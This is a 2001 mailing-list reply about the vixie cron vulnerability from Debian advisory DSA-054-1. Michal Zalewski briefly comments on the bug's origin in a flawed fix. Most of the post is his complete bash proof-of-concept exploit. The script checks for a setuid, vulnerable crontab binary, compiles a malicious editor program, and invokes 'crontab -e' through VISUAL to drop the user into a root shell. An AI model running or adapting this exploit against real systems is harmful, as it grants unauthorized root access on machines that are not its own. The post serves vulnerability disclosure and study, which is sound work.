Re: Vixie cron vulnerability

Tue, 08 May 2001 15:02:37 -0700 

On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, there is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <[EMAIL PROTECTED]>                   |"
echo "| Michal Zalewski <[EMAIL PROTECTED]>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else { 
    dup2(1,0); 
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n"); 
    system("touch $HOME/.xploited");
    system("bash"); 
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi

Reply via email to